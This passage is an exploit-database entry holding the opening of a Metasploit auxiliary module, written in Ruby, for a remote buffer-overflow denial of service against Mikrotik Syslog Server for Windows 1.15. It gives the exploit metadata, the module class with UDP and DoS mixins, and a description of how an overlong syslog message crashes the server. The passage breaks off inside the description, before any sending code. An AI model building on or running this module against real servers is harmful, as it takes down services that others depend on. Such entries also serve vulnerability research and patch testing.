Mikrotik Syslog Server for Windows 1.15 - Denial of Service
# Exploit Title: Mikrotik Syslog Server for Windows - remote BOF DOS
# Date: 19.04.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: www.mikrotik.com
# Software Link: http://www.mikrotik.com/download/MT_Syslog.exe
# Version: 1.15 (most recent version 19.04.2013)
# Tested on: Windows XP SP3, Windows 7 SP1
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize
super(
'Name' => 'Mikrotik Syslog Server for Windows - remote BOF DOS',
'Description' => %q{
This module triggers the windows socket error WSAEMSGSIZE (message to long)
in the Mikrotik Syslog Server for Windows v 1.15 and crashes it.
The long syslog message overwrite the allocated buffer space causing the socket error.